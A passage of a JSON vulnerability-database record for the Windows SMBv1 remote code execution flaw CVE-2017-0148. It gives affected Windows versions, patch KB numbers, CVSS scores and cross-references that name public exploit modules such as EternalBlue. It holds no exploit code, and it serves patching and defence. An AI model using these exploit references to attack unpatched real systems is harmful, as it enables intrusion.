[{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:47:39", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T06:50:12", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB3210721", "KB3205401", "KB4012216", "KB4013198", "KB3213986", "KB4012214", "KB4012217", "KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB3177186", "KB4012212", "KB4012215", "KB4012598", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:50:12", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "3c8f710d7629e55dea40adfa20c8440d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": 